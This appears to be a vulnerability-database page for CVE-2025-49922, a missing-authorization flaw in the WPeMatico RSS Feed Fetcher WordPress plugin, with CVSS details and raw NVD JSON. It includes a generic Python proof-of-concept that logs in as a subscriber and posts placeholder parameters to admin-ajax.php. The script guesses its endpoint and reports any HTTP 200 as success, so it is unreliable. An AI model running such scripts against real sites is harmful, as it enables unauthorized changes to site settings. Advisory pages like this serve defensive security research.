Security Vulnerability Report
中文
CVE-2025-49922 CVSS 4.3 MEDIUM

CVE-2025-49922

Published: 2025-10-22 15:15:38
Last Modified: 2026-04-27 20:16:17

Description

Missing Authorization vulnerability in etruel WPeMatico RSS Feed Fetcher wpematico allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPeMatico RSS Feed Fetcher: from n/a through <= 2.8.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WPeMatico RSS Feed Fetcher <= 2.8.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-49922 PoC - WPeMatico RSS Feed Fetcher Broken Access Control # Vulnerability: Missing Authorization allowing low-privilege users to perform unauthorized actions # Affected versions: <= 2.8.3 import requests # Configuration TARGET_URL = "http://target-wordpress-site.com" USERNAME = "subscriber_user" # Low-privilege WordPress account PASSWORD = "user_password" # Step 1: Login as a low-privilege user (e.g., subscriber) session = requests.Session() login_data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In", "redirect_to": f"{TARGET_URL}/wp-admin/", "testcookie": "1" } session.post(f"{TARGET_URL}/wp-login.php", data=login_data) # Step 2: Extract nonce from the admin page (if accessible) # Note: The actual exploit endpoint may vary based on the specific vulnerable function response = session.get(f"{TARGET_URL}/wp-admin/admin.php?page=wpematico_settings") # Step 3: Attempt to access/modify plugin settings without proper authorization # This request demonstrates the broken access control - the endpoint should # verify the user has 'manage_options' capability but fails to do so unauthorized_action = { "action": "wpematico_action", # Example action name "_wpnonce": "extracted_nonce", # Nonce value if needed "option": "malicious_value" # Malicious parameter } # Step 4: Send the unauthorized request response = session.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=unauthorized_action ) if response.status_code == 200: print("[+] Exploit successful - Unauthorized action performed") else: print("[-] Exploit failed") # Note: Actual exploitation requires identifying the specific vulnerable # endpoint and crafting appropriate parameters based on the plugin version

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49922", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:38.073", "lastModified": "2026-04-27T20:16:17.473", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in etruel WPeMatico RSS Feed Fetcher wpematico allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPeMatico RSS Feed Fetcher: from n/a through <= 2.8.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wpematico/vulnerability/wordpress-wpematico-rss-feed-fetcher-plugin-2-8-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}